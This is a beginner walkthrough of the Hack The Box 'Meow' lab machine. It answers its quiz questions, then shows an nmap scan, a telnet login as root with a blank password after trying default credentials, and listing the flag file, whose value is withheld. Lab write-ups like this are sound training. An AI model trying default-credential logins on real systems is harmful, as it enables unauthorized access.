HTB - Meow - Walkthrough

The aim of this walkthrough is to provide help with the Meow machine on the Hack The Box website. Please note that no flags are directly provided here. Moreover, be aware that this is only one of the many ways to solve the challenges.

It belongs to a series of tutorials that aim to help out complete beginners with finishing the Starting Point TIER 0 challenges.

SETUP

There are a couple of ways to connect to the target machine. The one we will be using throughout this walkthrough is via the provided pwnbox.

Once our connection is taken care of, we spawn the target machine.

Additionally - even though not required - it is possible to set a local variable (only available in the current shell) containing our target host’s IP address. Once set, we can easily access it by prepending a $ to our variable name.

TASK 1

Question: What does the acronym VM stand for?

A simple internet search should suffice for this task.

virtual machine

TASK 2

Question: What tool do we use to interact with the operating system in order to issue commands via the command line, such as the one to start our VPN connection? It’s also known as a console or shell.

Same as before, use the internet.

terminal

TASK 3

Question: What service do we use to form our VPN connection into HTB labs?

There are multiple documents on the Hack The Box website describing the various ways you can connect to the target machine.

openvpn

TASK 4

Question: What is the abbreviated name for a ’tunnel interface’ in the output of your VPN boot-up sequence output?

One of the ways to figure that out, is to list all your network interfaces. You could do this with the ifconfig command.

tun

TASK 5

Question: What tool do we use to test our connection to the target with an ICMP echo request?

Quick search on the internet should get you the answer.

ping

TASK 6

Question: What is the name of the most common tool for finding open ports on a target?

Just like in the previous task, use the internet.

nmap

TASK 7

Question: What service do we identify on port 23/tcp during our scans?

Simply use nmap to scan the top 1000 ports on the target machine.

┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $nmap 10.129.30.251
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-04 09:06 BST
Nmap scan report for 10.129.30.251
Host is up (0.064s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE
23/tcp open  telnet

Nmap done: 1 IP address (1 host up) scanned in 0.80 seconds
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $

Only one port seems to be open:

telnet

TASK 8

Question: What username is able to log into the target over telnet with a blank password?

We can use the telnet command to connect to the service. Once connected, try out some common username:password pairs.

The first I tried user:password was a bust, but for the second, root:root, I did not even have to provide the password.

┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $telnet 10.129.30.251 23
Trying 10.129.30.251...
Connected to 10.129.30.251.
Escape character is '^]'.

  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█


Meow login: user
Password: 

Login incorrect
Meow login: root
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 04 May 2023 08:16:35 AM UTC

  System load:           0.0
  Usage of /:            41.7% of 7.75GB
  Memory usage:          4%
  Swap usage:            0%
  Processes:             138
  Users logged in:       0
  IPv4 address for eth0: 10.129.30.251
  IPv6 address for eth0: dead:beef::250:56ff:fe96:247c

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

75 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Thu May  4 08:15:52 UTC 2023 on pts/0
root@Meow:~#

root

SUBMIT FLAG

Question: Submit root flag

Once we logged in via telnet, we will find ourselves with root privileges and in the root home directory.

Simply listing all the files in your directory will reveal the flag. Grab it, to continue.

root@Meow:~# ll
total 36
drwx------  5 root root 4096 Jun 18  2021 ./
drwxr-xr-x 20 root root 4096 Jul  7  2021 ../
lrwxrwxrwx  1 root root    9 Jun  4  2021 .bash_history -> /dev/null
-rw-r--r--  1 root root 3132 Oct  6  2020 .bashrc
drwx------  2 root root 4096 Apr 21  2021 .cache/
-rw-r--r--  1 root root   33 Jun 17  2021 flag.txt
drwxr-xr-x  3 root root 4096 Apr 21  2021 .local/
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r--r--  1 root root   75 Mar 26  2021 .selected_editor
drwxr-xr-x  3 root root 4096 Apr 21  2021 snap/
root@Meow:~# cat flag.txt 
<flag>
root@Meow:~#

flag

Make sure to terminate the target box before you continue with the next machine!

SETUP#

TASK 1#

TASK 2#

TASK 3#

TASK 4#

TASK 5#

TASK 6#

TASK 7#

TASK 8#

SUBMIT FLAG#